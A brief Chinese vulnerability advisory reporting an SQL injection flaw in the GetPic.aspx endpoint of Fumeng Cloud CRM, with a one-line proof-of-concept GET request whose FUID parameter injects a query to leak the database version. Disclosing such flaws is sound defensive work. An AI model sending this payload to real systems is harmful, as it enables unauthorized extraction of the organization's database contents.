孚盟云CRM GetPic SQL注入漏洞

日期: 2025-07-16 | 影响软件: 孚盟云 | POC: 已公开

漏洞描述

上海孚盟软件有限公司孚盟云存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。

PoC代码

GET /Common/GetPic.aspx?FUID=-1'and+1=@@VERSION-- HTTP/1.1

相关漏洞推荐